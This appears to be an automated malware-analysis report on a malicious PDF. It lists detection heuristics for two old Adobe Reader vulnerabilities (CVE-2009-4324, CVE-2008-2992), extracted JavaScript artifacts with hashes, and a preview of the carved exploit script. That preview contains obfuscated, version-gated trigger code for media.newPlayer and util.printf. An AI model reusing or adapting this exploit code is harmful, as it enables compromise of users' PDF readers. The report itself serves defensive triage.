MALICIOUS
Risk Score: 268
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics (7)
- media.newPlayer — CVE-2009-4324 [critical; CVE; exact] (rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
- util.printf — CVE-2008-2992 [critical; CVE; exact] (rule CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
- Multi-CVE Adobe Reader JavaScript exploit kit [critical] (rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- Generic recovered JavaScript exploit stage [high] (rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- JavaScript action [low; 1 related finding] (rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream [low] (rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact [info] (rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (4)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0006_000.js | pdf-javascript-stream | PDF /JS object 6 at offset 0x167 | 6603 bytes |

SHA-256: 8693bc5f6481ecab86832c853b54a5ae110306f474ba543a0accc706d54efc6c
Preview script (first 1,000 lines of the extracted script):
var version = app.viewerVersion.toString();
if(version>=8.0)
{
util.printd("UcDiTDslmSOGyIAvnrigdAPgAfIGJkTqHqZt", new Date());
var xxx=ddddddd("this.%20%20%20me"+/**/"dia.%20%20%20new"+/**/"Play"+/**/"er%28nu"+/**/"ll%29%3B");
try {dxdxdx(xxx);} catch(e) {}
util.printd(wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn, new Date());
}
if(version>=7.0 && version<8)
{
var la = '12999999999999999999';
for(ii=0;ii<276;ii++)
la += '8';
var yyy=ddddddd("util.%20%20%20pr"+/**/"%69%6etf"+/**/"%28%22%25"+/**/"%34%35%30%30%30%66"+/**/"%22%2C%6c%61%29%3B");
try{dxdxdx(yyy)} catch(e){}
}

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0006_001.js | pdf-javascript-stream | PDF /JS object 6 at offset 0x18A | 6827 bytes |

SHA-256: 8737a2c8523da449cb38bcfbfdc9b506f3c1a6ef78a61eb0fcc12a60f4e626db

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery percent-decode from decompressed stream at 0x167 at offset 0x167 | 5129 bytes |

SHA-256: 5f4ec2d05c783b74f76825c15277f2a22af53716d359071c6c3bd5815f29b55b

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob(s).

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery percent-decode from decompressed stream at 0x18A at offset 0x18A | 5305 bytes |

SHA-256: a368c9c7c92054f296d745d890740a7fe8d615bfc6966f680711f3951aab24a3

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s).